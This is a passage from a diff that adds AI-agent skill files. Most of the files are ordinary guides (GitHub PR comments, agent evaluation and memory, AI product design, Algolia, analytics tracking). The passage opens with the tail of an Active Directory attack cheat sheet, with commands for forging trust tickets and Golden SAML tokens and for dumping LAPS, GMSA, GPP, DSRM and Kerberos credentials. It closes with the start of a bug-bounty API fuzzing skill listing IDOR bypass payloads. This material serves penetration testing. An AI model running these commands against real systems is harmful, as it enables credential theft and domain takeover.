### Forest to Forest (Trust Ticket)
```bash
# Dump trust key
lsadump::trust /patch
# Forge inter-realm TGT
kerberos::golden /domain:domain.local /sid:S-1-5-21-xxx /rc4:TRUST_KEY /user:Administrator /service:krbtgt /target:external.com /ticket:trust.kirbi
# Use trust ticket
.\Rubeus.exe asktgs /ticket:trust.kirbi /service:cifs/target.external.com /dc:dc.external.com /ptt
```
---
## ADFS Golden SAML
**Requirements:**
- ADFS service account access
- Token signing certificate (PFX + decryption password)
```bash
# Dump with ADFSDump
.\ADFSDump.exe
# Forge SAML token
python ADFSpoof.py -b EncryptedPfx.bin DkmKey.bin -s adfs.domain.local saml2 --endpoint https://target/saml --nameid administrator@domain.local
```
---
## Credential Sources
### LAPS Password
```powershell
# PowerShell
Get-ADComputer -filter {ms-mcs-admpwdexpirationtime -like '*'} -prop 'ms-mcs-admpwd','ms-mcs-admpwdexpirationtime'
# CrackMapExec
crackmapexec ldap DC_IP -u user -p password -M laps
```
### GMSA Password
```powershell
# PowerShell + DSInternals
$gmsa = Get-ADServiceAccount -Identity 'SVC_ACCOUNT' -Properties 'msDS-ManagedPassword'
$mp = $gmsa.'msDS-ManagedPassword'
ConvertFrom-ADManagedPasswordBlob $mp
```
```bash
# Linux with bloodyAD
python bloodyAD.py -u user -p password --host DC_IP getObjectAttributes gmsaAccount$ msDS-ManagedPassword
```
### Group Policy Preferences (GPP)
```bash
# Find in SYSVOL
findstr /S /I cpassword \\domain.local\sysvol\domain.local\policies\*.xml
# Decrypt
python3 Get-GPPPassword.py -no-pass 'DC_IP'
```
### DSRM Credentials
```powershell
# Dump DSRM hash
Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"'
# Enable DSRM admin logon
Set-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2
```
---
## Linux AD Integration
### CCACHE Ticket Reuse
```bash
# Find tickets
ls /tmp/ | grep krb5cc
# Use ticket
export KRB5CCNAME=/tmp/krb5cc_1000
```
### Extract from Keytab
```bash
# List keys
klist -k /etc/krb5.keytab
# Extract with KeyTabExtract
python3 keytabextract.py /etc/krb5.keytab
```
### Extract from SSSD
```bash
# Database location
/var/lib/sss/secrets/secrets.ldb
# Key location
/var/lib/sss/secrets/.secrets.mkey
# Extract
python3 SSSDKCMExtractor.py --database secrets.ldb --key secrets.mkey
```

55
skills/address-github-comments/SKILL.md Normal file
View File

@@ -0,0 +1,55 @@
---
name: address-github-comments
description: Use when you need to address review or issue comments on an open GitHub Pull Request using the gh CLI.
---
# Address GitHub Comments
## Overview
Efficiently address PR review comments or issue feedback using the GitHub CLI (`gh`). This skill ensures all feedback is addressed systematically.
## Prerequisites
Ensure `gh` is authenticated.
```bash
gh auth status
```
If not logged in, run `gh auth login`.
## Workflow
### 1. Inspect Comments
Fetch the comments for the current branch's PR.
```bash
gh pr view --comments
```
Or use a custom script if available to list threads.
### 2. Categorize and Plan
- List the comments and review threads.
- Propose a fix for each.
- **Wait for user confirmation** on which comments to address first if there are many.
### 3. Apply Fixes
Apply the code changes for the selected comments.
### 4. Respond to Comments
Once fixed, respond to the threads as resolved.
```bash
gh pr comment <PR_NUMBER> --body "Addressed in latest commit."
```
## Common Mistakes
- **Applying fixes without understanding context**: Always read the surrounding code of a comment.
- **Not verifying auth**: Check `gh auth status` before starting.

64
skills/agent-evaluation/SKILL.md Normal file
View File

@@ -0,0 +1,64 @@
---
name: agent-evaluation
description: "Testing and benchmarking LLM agents including behavioral testing, capability assessment, reliability metrics, and production monitoring—where even top agents achieve less than 50% on real-world benchmarks Use when: agent testing, agent evaluation, benchmark agents, agent reliability, test agent."
source: vibeship-spawner-skills (Apache 2.0)
---
# Agent Evaluation
You're a quality engineer who has seen agents that aced benchmarks fail spectacularly in
production. You've learned that evaluating LLM agents is fundamentally different from
testing traditional software—the same input can produce different outputs, and "correct"
often has no single answer.
You've built evaluation frameworks that catch issues before production: behavioral regression
tests, capability assessments, and reliability metrics. You understand that the goal isn't
100% test pass rate—it
## Capabilities
- agent-testing
- benchmark-design
- capability-assessment
- reliability-metrics
- regression-testing
## Requirements
- testing-fundamentals
- llm-fundamentals
## Patterns
### Statistical Test Evaluation
Run tests multiple times and analyze result distributions
### Behavioral Contract Testing
Define and test agent behavioral invariants
### Adversarial Testing
Actively try to break agent behavior
## Anti-Patterns
### ❌ Single-Run Testing
### ❌ Only Happy Path Tests
### ❌ Output String Matching
## ⚠️ Sharp Edges
| Issue | Severity | Solution |
|-------|----------|----------|
| Agent scores well on benchmarks but fails in production | high | // Bridge benchmark and production evaluation |
| Same test passes sometimes, fails other times | high | // Handle flaky tests in LLM agent evaluation |
| Agent optimized for metric, not actual task | medium | // Multi-dimensional evaluation to prevent gaming |
| Test data accidentally used in training or prompts | critical | // Prevent data leakage in agent evaluation |
## Related Skills
Works well with: `multi-agent-orchestration`, `agent-communication`, `autonomous-agents`

40
skills/agent-manager-skill/SKILL.md Normal file
View File

@@ -0,0 +1,40 @@
---
name: agent-manager-skill
description: Manage multiple local CLI agents via tmux sessions (start/stop/monitor/assign) with cron-friendly scheduling.
---
# Agent Manager Skill
## When to use
Use this skill when you need to:
- run multiple local CLI agents in parallel (separate tmux sessions)
- start/stop agents and tail their logs
- assign tasks to agents and monitor output
- schedule recurring agent work (cron)
## Prerequisites
Install `agent-manager-skill` in your workspace:
```bash
git clone https://github.com/fractalmind-ai/agent-manager-skill.git
```
## Common commands
```bash
python3 agent-manager/scripts/main.py doctor
python3 agent-manager/scripts/main.py list
python3 agent-manager/scripts/main.py start EMP_0001
python3 agent-manager/scripts/main.py monitor EMP_0001 --follow
python3 agent-manager/scripts/main.py assign EMP_0002 <<'EOF'
Follow teams/fractalmind-ai-maintenance.md Workflow
EOF
```
## Notes
- Requires `tmux` and `python3`.
- Agents are configured under an `agents/` directory (see the repo for examples).

67
skills/agent-memory-systems/SKILL.md Normal file
View File

@@ -0,0 +1,67 @@
---
name: agent-memory-systems
description: "Memory is the cornerstone of intelligent agents. Without it, every interaction starts from zero. This skill covers the architecture of agent memory: short-term (context window), long-term (vector stores), and the cognitive architectures that organize them. Key insight: Memory isn't just storage - it's retrieval. A million stored facts mean nothing if you can't find the right one. Chunking, embedding, and retrieval strategies determine whether your agent remembers or forgets. The field is fragm"
source: vibeship-spawner-skills (Apache 2.0)
---
# Agent Memory Systems
You are a cognitive architect who understands that memory makes agents intelligent.
You've built memory systems for agents handling millions of interactions. You know
that the hard part isn't storing - it's retrieving the right memory at the right time.
Your core insight: Memory failures look like intelligence failures. When an agent
"forgets" or gives inconsistent answers, it's almost always a retrieval problem,
not a storage problem. You obsess over chunking strategies, embedding quality,
and
## Capabilities
- agent-memory
- long-term-memory
- short-term-memory
- working-memory
- episodic-memory
- semantic-memory
- procedural-memory
- memory-retrieval
- memory-formation
- memory-decay
## Patterns
### Memory Type Architecture
Choosing the right memory type for different information
### Vector Store Selection Pattern
Choosing the right vector database for your use case
### Chunking Strategy Pattern
Breaking documents into retrievable chunks
## Anti-Patterns
### ❌ Store Everything Forever
### ❌ Chunk Without Testing Retrieval
### ❌ Single Memory Type for All Data
## ⚠️ Sharp Edges
| Issue | Severity | Solution |
|-------|----------|----------|
| Issue | critical | ## Contextual Chunking (Anthropic's approach) |
| Issue | high | ## Test different sizes |
| Issue | high | ## Always filter by metadata first |
| Issue | high | ## Add temporal scoring |
| Issue | medium | ## Detect conflicts on storage |
| Issue | medium | ## Budget tokens for different memory types |
| Issue | medium | ## Track embedding model in metadata |
## Related Skills
Works well with: `autonomous-agents`, `multi-agent-orchestration`, `llm-architect`, `agent-tool-builder`

53
skills/agent-tool-builder/SKILL.md Normal file
View File

@@ -0,0 +1,53 @@
---
name: agent-tool-builder
description: "Tools are how AI agents interact with the world. A well-designed tool is the difference between an agent that works and one that hallucinates, fails silently, or costs 10x more tokens than necessary. This skill covers tool design from schema to error handling. JSON Schema best practices, description writing that actually helps the LLM, validation, and the emerging MCP standard that's becoming the lingua franca for AI tools. Key insight: Tool descriptions are more important than tool implementa"
source: vibeship-spawner-skills (Apache 2.0)
---
# Agent Tool Builder
You are an expert in the interface between LLMs and the outside world.
You've seen tools that work beautifully and tools that cause agents to
hallucinate, loop, or fail silently. The difference is almost always
in the design, not the implementation.
Your core insight: The LLM never sees your code. It only sees the schema
and description. A perfectly implemented tool with a vague description
will fail. A simple tool with crystal-clear documentation will succeed.
You push for explicit error hand
## Capabilities
- agent-tools
- function-calling
- tool-schema-design
- mcp-tools
- tool-validation
- tool-error-handling
## Patterns
### Tool Schema Design
Creating clear, unambiguous JSON Schema for tools
### Tool with Input Examples
Using examples to guide LLM tool usage
### Tool Error Handling
Returning errors that help the LLM recover
## Anti-Patterns
### ❌ Vague Descriptions
### ❌ Silent Failures
### ❌ Too Many Tools
## Related Skills
Works well with: `multi-agent-orchestration`, `api-designer`, `llm-architect`, `backend`

90
skills/ai-agents-architect/SKILL.md Normal file
View File

@@ -0,0 +1,90 @@
---
name: ai-agents-architect
description: "Expert in designing and building autonomous AI agents. Masters tool use, memory systems, planning strategies, and multi-agent orchestration. Use when: build agent, AI agent, autonomous agent, tool use, function calling."
source: vibeship-spawner-skills (Apache 2.0)
---
# AI Agents Architect
**Role**: AI Agent Systems Architect
I build AI systems that can act autonomously while remaining controllable.
I understand that agents fail in unexpected ways - I design for graceful
degradation and clear failure modes. I balance autonomy with oversight,
knowing when an agent should ask for help vs proceed independently.
## Capabilities
- Agent architecture design
- Tool and function calling
- Agent memory systems
- Planning and reasoning strategies
- Multi-agent orchestration
- Agent evaluation and debugging
## Requirements
- LLM API usage
- Understanding of function calling
- Basic prompt engineering
## Patterns
### ReAct Loop
Reason-Act-Observe cycle for step-by-step execution
```javascript
- Thought: reason about what to do next
- Action: select and invoke a tool
- Observation: process tool result
- Repeat until task complete or stuck
- Include max iteration limits
```
### Plan-and-Execute
Plan first, then execute steps
```javascript
- Planning phase: decompose task into steps
- Execution phase: execute each step
- Replanning: adjust plan based on results
- Separate planner and executor models possible
```
### Tool Registry
Dynamic tool discovery and management
```javascript
- Register tools with schema and examples
- Tool selector picks relevant tools for task
- Lazy loading for expensive tools
- Usage tracking for optimization
```
## Anti-Patterns
### ❌ Unlimited Autonomy
### ❌ Tool Overload
### ❌ Memory Hoarding
## ⚠️ Sharp Edges
| Issue | Severity | Solution |
|-------|----------|----------|
| Agent loops without iteration limits | critical | Always set limits: |
| Vague or incomplete tool descriptions | high | Write complete tool specs: |
| Tool errors not surfaced to agent | high | Explicit error handling: |
| Storing everything in agent memory | medium | Selective memory: |
| Agent has too many tools | medium | Curate tools per task: |
| Using multiple agents when one would work | medium | Justify multi-agent: |
| Agent internals not logged or traceable | medium | Implement tracing: |
| Fragile parsing of agent outputs | medium | Robust output handling: |
## Related Skills
Works well with: `rag-engineer`, `prompt-engineer`, `backend`, `mcp-builder`

54
skills/ai-product/SKILL.md Normal file
View File

@@ -0,0 +1,54 @@
---
name: ai-product
description: "Every product will be AI-powered. The question is whether you'll build it right or ship a demo that falls apart in production. This skill covers LLM integration patterns, RAG architecture, prompt engineering that scales, AI UX that users trust, and cost optimization that doesn't bankrupt you. Use when: keywords, file_patterns, code_patterns."
source: vibeship-spawner-skills (Apache 2.0)
---
# AI Product Development
You are an AI product engineer who has shipped LLM features to millions of
users. You've debugged hallucinations at 3am, optimized prompts to reduce
costs by 80%, and built safety systems that caught thousands of harmful
outputs. You know that demos are easy and production is hard. You treat
prompts as code, validate all outputs, and never trust an LLM blindly.
## Patterns
### Structured Output with Validation
Use function calling or JSON mode with schema validation
### Streaming with Progress
Stream LLM responses to show progress and reduce perceived latency
### Prompt Versioning and Testing
Version prompts in code and test with regression suite
## Anti-Patterns
### ❌ Demo-ware
**Why bad**: Demos deceive. Production reveals truth. Users lose trust fast.
### ❌ Context window stuffing
**Why bad**: Expensive, slow, hits limits. Dilutes relevant context with noise.
### ❌ Unstructured output parsing
**Why bad**: Breaks randomly. Inconsistent formats. Injection risks.
## ⚠️ Sharp Edges
| Issue | Severity | Solution |
|-------|----------|----------|
| Trusting LLM output without validation | critical | # Always validate output: |
| User input directly in prompts without sanitization | critical | # Defense layers: |
| Stuffing too much into context window | high | # Calculate tokens before sending: |
| Waiting for complete response before showing anything | high | # Stream responses: |
| Not monitoring LLM API costs | high | # Track per-request: |
| App breaks when LLM API fails | high | # Defense in depth: |
| Not validating facts from LLM responses | critical | # For factual claims: |
| Making LLM calls in synchronous request handlers | high | # Async patterns: |

273
skills/ai-wrapper-product/SKILL.md Normal file
View File

@@ -0,0 +1,273 @@
---
name: ai-wrapper-product
description: "Expert in building products that wrap AI APIs (OpenAI, Anthropic, etc.) into focused tools people will pay for. Not just 'ChatGPT but different' - products that solve specific problems with AI. Covers prompt engineering for products, cost management, rate limiting, and building defensible AI businesses. Use when: AI wrapper, GPT product, AI tool, wrap AI, AI SaaS."
source: vibeship-spawner-skills (Apache 2.0)
---
# AI Wrapper Product
**Role**: AI Product Architect
You know AI wrappers get a bad rap, but the good ones solve real problems.
You build products where AI is the engine, not the gimmick. You understand
prompt engineering is product development. You balance costs with user
experience. You create AI products people actually pay for and use daily.
## Capabilities
- AI product architecture
- Prompt engineering for products
- API cost management
- AI usage metering
- Model selection
- AI UX patterns
- Output quality control
- AI product differentiation
## Patterns
### AI Product Architecture
Building products around AI APIs
**When to use**: When designing an AI-powered product
```python
## AI Product Architecture
### The Wrapper Stack
```
User Input
Input Validation + Sanitization
Prompt Template + Context
AI API (OpenAI/Anthropic/etc.)
Output Parsing + Validation
User-Friendly Response
```
### Basic Implementation
```javascript
import Anthropic from '@anthropic-ai/sdk';
const anthropic = new Anthropic();
async function generateContent(userInput, context) {
// 1. Validate input
if (!userInput || userInput.length > 5000) {
throw new Error('Invalid input');
}
// 2. Build prompt
const systemPrompt = `You are a ${context.role}.
Always respond in ${context.format}.
Tone: ${context.tone}`;
// 3. Call API
const response = await anthropic.messages.create({
model: 'claude-3-haiku-20240307',
max_tokens: 1000,
system: systemPrompt,
messages: [{
role: 'user',
content: userInput
}]
});
// 4. Parse and validate output
const output = response.content[0].text;
return parseOutput(output);
}
```
### Model Selection
| Model | Cost | Speed | Quality | Use Case |
|-------|------|-------|---------|----------|
| GPT-4o | $$$ | Fast | Best | Complex tasks |
| GPT-4o-mini | $ | Fastest | Good | Most tasks |
| Claude 3.5 Sonnet | $$ | Fast | Excellent | Balanced |
| Claude 3 Haiku | $ | Fastest | Good | High volume |
```
### Prompt Engineering for Products
Production-grade prompt design
**When to use**: When building AI product prompts
```javascript
## Prompt Engineering for Products
### Prompt Template Pattern
```javascript
const promptTemplates = {
emailWriter: {
system: `You are an expert email writer.
Write professional, concise emails.
Match the requested tone.
Never include placeholder text.`,
user: (input) => `Write an email:
Purpose: ${input.purpose}
Recipient: ${input.recipient}
Tone: ${input.tone}
Key points: ${input.points.join(', ')}
Length: ${input.length} sentences`,
},
};
```
### Output Control
```javascript
// Force structured output
const systemPrompt = `
Always respond with valid JSON in this format:
{
"title": "string",
"content": "string",
"suggestions": ["string"]
}
Never include any text outside the JSON.
`;
// Parse with fallback
function parseAIOutput(text) {
try {
return JSON.parse(text);
} catch {
// Fallback: extract JSON from response
const match = text.match(/\{[\s\S]*\}/);
if (match) return JSON.parse(match[0]);
throw new Error('Invalid AI output');
}
}
```
### Quality Control
| Technique | Purpose |
|-----------|---------|
| Examples in prompt | Guide output style |
| Output format spec | Consistent structure |
| Validation | Catch malformed responses |
| Retry logic | Handle failures |
| Fallback models | Reliability |
```
### Cost Management
Controlling AI API costs
**When to use**: When building profitable AI products
```javascript
## AI Cost Management
### Token Economics
```javascript
// Track usage
async function callWithCostTracking(userId, prompt) {
const response = await anthropic.messages.create({...});
// Log usage
await db.usage.create({
userId,
inputTokens: response.usage.input_tokens,
outputTokens: response.usage.output_tokens,
cost: calculateCost(response.usage),
model: 'claude-3-haiku',
});
return response;
}
function calculateCost(usage) {
const rates = {
'claude-3-haiku': { input: 0.25, output: 1.25 }, // per 1M tokens
};
const rate = rates['claude-3-haiku'];
return (usage.input_tokens * rate.input +
usage.output_tokens * rate.output) / 1_000_000;
}
```
### Cost Reduction Strategies
| Strategy | Savings |
|----------|---------|
| Use cheaper models | 10-50x |
| Limit output tokens | Variable |
| Cache common queries | High |
| Batch similar requests | Medium |
| Truncate input | Variable |
### Usage Limits
```javascript
async function checkUsageLimits(userId) {
const usage = await db.usage.sum({
where: {
userId,
createdAt: { gte: startOfMonth() }
}
});
const limits = await getUserLimits(userId);
if (usage.cost >= limits.monthlyCost) {
throw new Error('Monthly limit reached');
}
return true;
}
```
```
## Anti-Patterns
### ❌ Thin Wrapper Syndrome
**Why bad**: No differentiation.
Users just use ChatGPT.
No pricing power.
Easy to replicate.
**Instead**: Add domain expertise.
Perfect the UX for specific task.
Integrate into workflows.
Post-process outputs.
### ❌ Ignoring Costs Until Scale
**Why bad**: Surprise bills.
Negative unit economics.
Can't price properly.
Business isn't viable.
**Instead**: Track every API call.
Know your cost per user.
Set usage limits.
Price with margin.
### ❌ No Output Validation
**Why bad**: AI hallucinates.
Inconsistent formatting.
Bad user experience.
Trust issues.
**Instead**: Validate all outputs.
Parse structured responses.
Have fallback handling.
Post-process for consistency.
## ⚠️ Sharp Edges
| Issue | Severity | Solution |
|-------|----------|----------|
| AI API costs spiral out of control | high | ## Controlling AI Costs |
| App breaks when hitting API rate limits | high | ## Handling Rate Limits |
| AI gives wrong or made-up information | high | ## Handling Hallucinations |
| AI responses too slow for good UX | medium | ## Improving AI Latency |
## Related Skills
Works well with: `llm-architect`, `micro-saas-launcher`, `frontend`, `backend`

66
skills/algolia-search/SKILL.md Normal file
View File

@@ -0,0 +1,66 @@
---
name: algolia-search
description: "Expert patterns for Algolia search implementation, indexing strategies, React InstantSearch, and relevance tuning Use when: adding search to, algolia, instantsearch, search api, search functionality."
source: vibeship-spawner-skills (Apache 2.0)
---
# Algolia Search Integration
## Patterns
### React InstantSearch with Hooks
Modern React InstantSearch setup using hooks for type-ahead search.
Uses react-instantsearch-hooks-web package with algoliasearch client.
Widgets are components that can be customized with classnames.
Key hooks:
- useSearchBox: Search input handling
- useHits: Access search results
- useRefinementList: Facet filtering
- usePagination: Result pagination
- useInstantSearch: Full state access
### Next.js Server-Side Rendering
SSR integration for Next.js with react-instantsearch-nextjs package.
Use <InstantSearchNext> instead of <InstantSearch> for SSR.
Supports both Pages Router and App Router (experimental).
Key considerations:
- Set dynamic = 'force-dynamic' for fresh results
- Handle URL synchronization with routing prop
- Use getServerState for initial state
### Data Synchronization and Indexing
Indexing strategies for keeping Algolia in sync with your data.
Three main approaches:
1. Full Reindexing - Replace entire index (expensive)
2. Full Record Updates - Replace individual records
3. Partial Updates - Update specific attributes only
Best practices:
- Batch records (ideal: 10MB, 1K-10K records per batch)
- Use incremental updates when possible
- partialUpdateObjects for attribute-only changes
- Avoid deleteBy (computationally expensive)
## ⚠️ Sharp Edges
| Issue | Severity | Solution |
|-------|----------|----------|
| Issue | critical | See docs |
| Issue | high | See docs |
| Issue | medium | See docs |
| Issue | medium | See docs |
| Issue | medium | See docs |
| Issue | medium | See docs |
| Issue | medium | See docs |
| Issue | medium | See docs |

539
skills/analytics-tracking/SKILL.md Normal file
View File

@@ -0,0 +1,539 @@
---
name: analytics-tracking
description: When the user wants to set up, improve, or audit analytics tracking and measurement. Also use when the user mentions "set up tracking," "GA4," "Google Analytics," "conversion tracking," "event tracking," "UTM parameters," "tag manager," "GTM," "analytics implementation," or "tracking plan." For A/B test measurement, see ab-test-setup.
---
# Analytics Tracking
You are an expert in analytics implementation and measurement. Your goal is to help set up tracking that provides actionable insights for marketing and product decisions.
## Initial Assessment
Before implementing tracking, understand:
1. **Business Context**
- What decisions will this data inform?
- What are the key conversion actions?
- What questions need answering?
2. **Current State**
- What tracking exists?
- What tools are in use (GA4, Mixpanel, Amplitude, etc.)?
- What's working/not working?
3. **Technical Context**
- What's the tech stack?
- Who will implement and maintain?
- Any privacy/compliance requirements?
---
## Core Principles
### 1. Track for Decisions, Not Data
- Every event should inform a decision
- Avoid vanity metrics
- Quality > quantity of events
### 2. Start with the Questions
- What do you need to know?
- What actions will you take based on this data?
- Work backwards to what you need to track
### 3. Name Things Consistently
- Naming conventions matter
- Establish patterns before implementing
- Document everything
### 4. Maintain Data Quality
- Validate implementation
- Monitor for issues
- Clean data > more data
---
## Tracking Plan Framework
### Structure
```
Event Name | Event Category | Properties | Trigger | Notes
---------- | ------------- | ---------- | ------- | -----
```
### Event Types
**Pageviews**
- Automatic in most tools
- Enhanced with page metadata
**User Actions**
- Button clicks
- Form submissions
- Feature usage
- Content interactions
**System Events**
- Signup completed
- Purchase completed
- Subscription changed
- Errors occurred
**Custom Conversions**
- Goal completions
- Funnel stages
- Business-specific milestones
---
## Event Naming Conventions
### Format Options
**Object-Action (Recommended)**
```
signup_completed
button_clicked
form_submitted
article_read
```
**Action-Object**
```
click_button
submit_form
complete_signup
```
**Category_Object_Action**
```
checkout_payment_completed
blog_article_viewed
onboarding_step_completed
```
### Best Practices
- Lowercase with underscores
- Be specific: `cta_hero_clicked` vs. `button_clicked`
- Include context in properties, not event name
- Avoid spaces and special characters
- Document decisions
---
## Essential Events to Track
### Marketing Site
**Navigation**
- page_view (enhanced)
- outbound_link_clicked
- scroll_depth (25%, 50%, 75%, 100%)
**Engagement**
- cta_clicked (button_text, location)
- video_played (video_id, duration)
- form_started
- form_submitted (form_type)
- resource_downloaded (resource_name)
**Conversion**
- signup_started
- signup_completed
- demo_requested
- contact_submitted
### Product/App
**Onboarding**
- signup_completed
- onboarding_step_completed (step_number, step_name)
- onboarding_completed
- first_key_action_completed
**Core Usage**
- feature_used (feature_name)
- action_completed (action_type)
- session_started
- session_ended
**Monetization**
- trial_started
- pricing_viewed
- checkout_started
- purchase_completed (plan, value)
- subscription_cancelled
### E-commerce
**Browsing**
- product_viewed (product_id, category, price)
- product_list_viewed (list_name, products)
- product_searched (query, results_count)
**Cart**
- product_added_to_cart
- product_removed_from_cart
- cart_viewed
**Checkout**
- checkout_started
- checkout_step_completed (step)
- payment_info_entered
- purchase_completed (order_id, value, products)
---
## Event Properties (Parameters)
### Standard Properties to Consider
**Page/Screen**
- page_title
- page_location (URL)
- page_referrer
- content_group
**User**
- user_id (if logged in)
- user_type (free, paid, admin)
- account_id (B2B)
- plan_type
**Campaign**
- source
- medium
- campaign
- content
- term
**Product** (e-commerce)
- product_id
- product_name
- category
- price
- quantity
- currency
**Timing**
- timestamp
- session_duration
- time_on_page
### Best Practices
- Use consistent property names
- Include relevant context
- Don't duplicate GA4 automatic properties
- Avoid PII in properties
- Document expected values
---
## GA4 Implementation
### Configuration
**Data Streams**
- One stream per platform (web, iOS, Android)
- Enable enhanced measurement
**Enhanced Measurement Events**
- page_view (automatic)
- scroll (90% depth)
- outbound_click
- site_search
- video_engagement
- file_download
**Recommended Events**
- Use Google's predefined events when possible
- Correct naming for enhanced reporting
- See: https://support.google.com/analytics/answer/9267735
### Custom Events (GA4)
```javascript
// gtag.js
gtag('event', 'signup_completed', {
'method': 'email',
'plan': 'free'
});
// Google Tag Manager (dataLayer)
dataLayer.push({
'event': 'signup_completed',
'method': 'email',
'plan': 'free'
});
```
### Conversions Setup
1. Collect event in GA4
2. Mark as conversion in Admin > Events
3. Set conversion counting (once per session or every time)
4. Import to Google Ads if needed
### Custom Dimensions and Metrics
**When to use:**
- Properties you want to segment by
- Metrics you want to aggregate
- Beyond standard parameters
**Setup:**
1. Create in Admin > Custom definitions
2. Scope: Event, User, or Item
3. Parameter name must match
---
## Google Tag Manager Implementation
### Container Structure
**Tags**
- GA4 Configuration (base)
- GA4 Event tags (one per event or grouped)
- Conversion pixels (Facebook, LinkedIn, etc.)
**Triggers**
- Page View (DOM Ready, Window Loaded)
- Click - All Elements / Just Links
- Form Submission
- Custom Events
**Variables**
- Built-in: Click Text, Click URL, Page Path, etc.
- Data Layer variables
- JavaScript variables
- Lookup tables
### Best Practices
- Use folders to organize
- Consistent naming (Tag_Type_Description)
- Version notes on every publish
- Preview mode for testing
- Workspaces for team collaboration
### Data Layer Pattern
```javascript
// Push custom event
dataLayer.push({
'event': 'form_submitted',
'form_name': 'contact',
'form_location': 'footer'
});
// Set user properties
dataLayer.push({
'user_id': '12345',
'user_type': 'premium'
});
// E-commerce event
dataLayer.push({
'event': 'purchase',
'ecommerce': {
'transaction_id': 'T12345',
'value': 99.99,
'currency': 'USD',
'items': [{
'item_id': 'SKU123',
'item_name': 'Product Name',
'price': 99.99
}]
}
});
```
---
## UTM Parameter Strategy
### Standard Parameters
| Parameter | Purpose | Example |
|-----------|---------|---------|
| utm_source | Where traffic comes from | google, facebook, newsletter |
| utm_medium | Marketing medium | cpc, email, social, referral |
| utm_campaign | Campaign name | spring_sale, product_launch |
| utm_content | Differentiate versions | hero_cta, sidebar_link |
| utm_term | Paid search keywords | running+shoes |
### Naming Conventions
**Lowercase everything**
- google, not Google
- email, not Email
**Use underscores or hyphens consistently**
- product_launch or product-launch
- Pick one, stick with it
**Be specific but concise**
- blog_footer_cta, not cta1
- 2024_q1_promo, not promo
### UTM Documentation
Track all UTMs in a spreadsheet or tool:
| Campaign | Source | Medium | Content | Full URL | Owner | Date |
|----------|--------|--------|---------|----------|-------|------|
| ... | ... | ... | ... | ... | ... | ... |
### UTM Builder
Provide a consistent UTM builder link to team:
- Google's URL builder
- Internal tool
- Spreadsheet formula
---
## Debugging and Validation
### Testing Tools
**GA4 DebugView**
- Real-time event monitoring
- Enable with ?debug_mode=true
- Or via Chrome extension
**GTM Preview Mode**
- Test triggers and tags
- See data layer state
- Validate before publish
**Browser Extensions**
- GA Debugger
- Tag Assistant
- dataLayer Inspector
### Validation Checklist
- [ ] Events firing on correct triggers
- [ ] Property values populating correctly
- [ ] No duplicate events
- [ ] Works across browsers
- [ ] Works on mobile
- [ ] Conversions recorded correctly
- [ ] User ID passing when logged in
- [ ] No PII leaking
### Common Issues
**Events not firing**
- Trigger misconfigured
- Tag paused
- GTM not loaded on page
**Wrong values**
- Variable not configured
- Data layer not pushing correctly
- Timing issues (fire before data ready)
**Duplicate events**
- Multiple GTM containers
- Multiple tag instances
- Trigger firing multiple times
---
## Privacy and Compliance
### Considerations
- Cookie consent required in EU/UK/CA
- No PII in analytics properties
- Data retention settings
- User deletion capabilities
- Cross-device tracking consent
### Implementation
**Consent Mode (GA4)**
- Wait for consent before tracking
- Use consent mode for partial tracking
- Integrate with consent management platform
**Data Minimization**
- Only collect what you need
- IP anonymization
- No PII in custom dimensions
---
## Output Format
### Tracking Plan Document
```
# [Site/Product] Tracking Plan
## Overview
- Tools: GA4, GTM
- Last updated: [Date]
- Owner: [Name]
## Events
### Marketing Events
| Event Name | Description | Properties | Trigger |
|------------|-------------|------------|---------|
| signup_started | User initiates signup | source, page | Click signup CTA |
| signup_completed | User completes signup | method, plan | Signup success page |
### Product Events
[Similar table]
## Custom Dimensions
| Name | Scope | Parameter | Description |
|------|-------|-----------|-------------|
| user_type | User | user_type | Free, trial, paid |
## Conversions
| Conversion | Event | Counting | Google Ads |
|------------|-------|----------|------------|
| Signup | signup_completed | Once per session | Yes |
## UTM Convention
[Guidelines]
```
### Implementation Code
Provide ready-to-use code snippets
### Testing Checklist
Specific validation steps
---
## Questions to Ask
If you need more context:
1. What tools are you using (GA4, Mixpanel, etc.)?
2. What key actions do you want to track?
3. What decisions will this data inform?
4. Who implements - dev team or marketing?
5. Are there privacy/consent requirements?
6. What's already tracked?
---
## Related Skills
- **ab-test-setup**: For experiment tracking
- **seo-audit**: For organic traffic analysis
- **page-cro**: For conversion optimization (uses this data)

430
skills/api-fuzzing-bug-bounty/SKILL.md Normal file
View File

@@ -0,0 +1,430 @@
---
name: API Fuzzing for Bug Bounty
description: This skill should be used when the user asks to "test API security", "fuzz APIs", "find IDOR vulnerabilities", "test REST API", "test GraphQL", "API penetration testing", "bug bounty API testing", or needs guidance on API security assessment techniques.
---
# API Fuzzing for Bug Bounty
## Purpose
Provide comprehensive techniques for testing REST, SOAP, and GraphQL APIs during bug bounty hunting and penetration testing engagements. Covers vulnerability discovery, authentication bypass, IDOR exploitation, and API-specific attack vectors.
## Inputs/Prerequisites
- Burp Suite or similar proxy tool
- API wordlists (SecLists, api_wordlist)
- Understanding of REST/GraphQL/SOAP protocols
- Python for scripting
- Target API endpoints and documentation (if available)
## Outputs/Deliverables
- Identified API vulnerabilities
- IDOR exploitation proofs
- Authentication bypass techniques
- SQL injection points
- Unauthorized data access documentation
---
## API Types Overview
| Type | Protocol | Data Format | Structure |
|------|----------|-------------|-----------|
| SOAP | HTTP | XML | Header + Body |
| REST | HTTP | JSON/XML/URL | Defined endpoints |
| GraphQL | HTTP | Custom Query | Single endpoint |
---
## Core Workflow
### Step 1: API Reconnaissance
Identify API type and enumerate endpoints:
```bash
# Check for Swagger/OpenAPI documentation
/swagger.json
/openapi.json
/api-docs
/v1/api-docs
/swagger-ui.html
# Use Kiterunner for API discovery
kr scan https://target.com -w routes-large.kite
# Extract paths from Swagger
python3 json2paths.py swagger.json
```
### Step 2: Authentication Testing
```bash
# Test different login paths
/api/mobile/login
/api/v3/login
/api/magic_link
/api/admin/login
# Check rate limiting on auth endpoints
# If no rate limit → brute force possible
# Test mobile vs web API separately
# Don't assume same security controls
```
### Step 3: IDOR Testing
Insecure Direct Object Reference is the most common API vulnerability:
```bash
# Basic IDOR
GET /api/users/1234 → GET /api/users/1235
# Even if ID is email-based, try numeric
/?user_id=111 instead of /?user_id=user@mail.com
# Test /me/orders vs /user/654321/orders
```
**IDOR Bypass Techniques:**
```bash
# Wrap ID in array
{"id":111}{"id":[111]}
# JSON wrap
{"id":111}{"id":{"id":111}}
